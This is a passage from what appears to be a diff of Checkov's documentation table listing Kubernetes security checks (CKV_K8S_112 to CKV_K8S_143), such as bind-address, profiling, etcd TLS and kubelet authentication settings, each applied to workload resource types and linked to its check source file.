[RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3346 | CKV_K8S_112 | resource | StatefulSet | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3347 | CKV_K8S_113 | resource | CronJob | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3348 | CKV_K8S_113 | resource | DaemonSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3349 | CKV_K8S_113 | resource | Deployment | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3350 | CKV_K8S_113 | resource | DeploymentConfig | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3351 | CKV_K8S_113 | resource | Job | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3352 | CKV_K8S_113 | resource | Pod | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3353 | CKV_K8S_113 | resource | PodTemplate | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3354 | CKV_K8S_113 | resource | ReplicaSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3355 | CKV_K8S_113 | resource | ReplicationController | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3356 | CKV_K8S_113 | resource | StatefulSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3357 | CKV_K8S_114 | resource | CronJob | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3358 | CKV_K8S_114 | resource | DaemonSet | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3359 | CKV_K8S_114 | resource | Deployment | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3360 | CKV_K8S_114 | resource | DeploymentConfig | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3361 | CKV_K8S_114 | resource | Job | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3362 | CKV_K8S_114 | resource | Pod | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3363 | CKV_K8S_114 | resource | PodTemplate | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3364 | CKV_K8S_114 | resource | ReplicaSet | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3365 | CKV_K8S_114 | resource | ReplicationController | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3366 | CKV_K8S_114 | resource | StatefulSet | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3367 | CKV_K8S_115 | resource | CronJob | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3368 | CKV_K8S_115 | resource | DaemonSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3369 | CKV_K8S_115 | resource | Deployment | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3370 | CKV_K8S_115 | resource | DeploymentConfig | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3371 | CKV_K8S_115 | resource | Job | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3372 | CKV_K8S_115 | resource | Pod | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3373 | CKV_K8S_115 | resource | PodTemplate | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3374 | CKV_K8S_115 | resource | ReplicaSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3375 | CKV_K8S_115 | resource | ReplicationController | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3376 | CKV_K8S_115 | resource | StatefulSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3377 | CKV_K8S_116 | resource | CronJob | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3378 | CKV_K8S_116 | resource | DaemonSet | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3379 | CKV_K8S_116 | resource | Deployment | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3380 | CKV_K8S_116 | resource | DeploymentConfig | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3381 | CKV_K8S_116 | resource | Job | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3382 | CKV_K8S_116 | resource | Pod | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3383 | CKV_K8S_116 | resource | PodTemplate | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3384 | CKV_K8S_116 | resource | ReplicaSet | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3385 | CKV_K8S_116 | resource | ReplicationController | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3386 | CKV_K8S_116 | resource | StatefulSet | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3387 | CKV_K8S_117 | resource | CronJob | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3388 | CKV_K8S_117 | resource | DaemonSet | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3389 | CKV_K8S_117 | resource | Deployment | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3390 | CKV_K8S_117 | resource | DeploymentConfig | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3391 | CKV_K8S_117 | resource | Job | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3392 | CKV_K8S_117 | resource | Pod | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3393 | CKV_K8S_117 | resource | PodTemplate | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3394 | CKV_K8S_117 | resource | ReplicaSet | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3395 | CKV_K8S_117 | resource | ReplicationController | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3396 | CKV_K8S_117 | resource | StatefulSet | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3397 | CKV_K8S_118 | resource | CronJob | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3398 | CKV_K8S_118 | resource | DaemonSet | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3399 | CKV_K8S_118 | resource | Deployment | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3400 | CKV_K8S_118 | resource | DeploymentConfig | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3401 | CKV_K8S_118 | resource | Job | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3402 | CKV_K8S_118 | resource | Pod | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3403 | CKV_K8S_118 | resource | PodTemplate | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3404 | CKV_K8S_118 | resource | ReplicaSet | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3405 | CKV_K8S_118 | resource | ReplicationController | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3406 | CKV_K8S_118 | resource | StatefulSet | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3407 | CKV_K8S_119 | resource | CronJob | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3408 | CKV_K8S_119 | resource | DaemonSet | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3409 | CKV_K8S_119 | resource | Deployment | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3410 | CKV_K8S_119 | resource | DeploymentConfig | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3411 | CKV_K8S_119 | resource | Job | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3412 | CKV_K8S_119 | resource | Pod | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3413 | CKV_K8S_119 | resource | PodTemplate | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3414 | CKV_K8S_119 | resource | ReplicaSet | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3415 | CKV_K8S_119 | resource | ReplicationController | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3416 | CKV_K8S_119 | resource | StatefulSet | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3417 | CKV_K8S_121 | resource | Pod | Ensure that the --peer-client-cert-auth argument is set to true | Kubernetes | [PeerClientCertAuthTrue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PeerClientCertAuthTrue.py) | +| 3418 | CKV_K8S_138 | resource | CronJob | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3419 | CKV_K8S_138 | resource | DaemonSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3420 | CKV_K8S_138 | resource | Deployment | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3421 | CKV_K8S_138 | resource | DeploymentConfig | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3422 | CKV_K8S_138 | resource | Job | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3423 | CKV_K8S_138 | resource | Pod | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3424 | CKV_K8S_138 | resource | PodTemplate | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3425 | CKV_K8S_138 | resource | ReplicaSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3426 | CKV_K8S_138 | resource | ReplicationController | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3427 | CKV_K8S_138 | resource | StatefulSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3428 | CKV_K8S_139 | resource | CronJob | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3429 | CKV_K8S_139 | resource | DaemonSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3430 | CKV_K8S_139 | resource | Deployment | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3431 | CKV_K8S_139 | resource | DeploymentConfig | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3432 | CKV_K8S_139 | resource | Job | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3433 | CKV_K8S_139 | resource | Pod | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3434 | CKV_K8S_139 | resource | PodTemplate | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3435 | CKV_K8S_139 | resource | ReplicaSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3436 | CKV_K8S_139 | resource | ReplicationController | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3437 | CKV_K8S_139 | resource | StatefulSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3438 | CKV_K8S_140 | resource | CronJob | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3439 | CKV_K8S_140 | resource | DaemonSet | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3440 | CKV_K8S_140 | resource | Deployment | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3441 | CKV_K8S_140 | resource | DeploymentConfig | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3442 | CKV_K8S_140 | resource | Job | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3443 | CKV_K8S_140 | resource | Pod | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3444 | CKV_K8S_140 | resource | PodTemplate | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3445 | CKV_K8S_140 | resource | ReplicaSet | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3446 | CKV_K8S_140 | resource | ReplicationController | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3447 | CKV_K8S_140 | resource | StatefulSet | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3448 | CKV_K8S_141 | resource | CronJob | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3449 | CKV_K8S_141 | resource | DaemonSet | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3450 | CKV_K8S_141 | resource | Deployment | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3451 | CKV_K8S_141 | resource | DeploymentConfig | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3452 | CKV_K8S_141 | resource | Job | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3453 | CKV_K8S_141 | resource | Pod | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3454 | CKV_K8S_141 | resource | PodTemplate | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3455 | CKV_K8S_141 | resource | ReplicaSet | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3456 | CKV_K8S_141 | resource | ReplicationController | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3457 | CKV_K8S_141 | resource | StatefulSet | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3458 | CKV_K8S_143 | resource | CronJob | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | 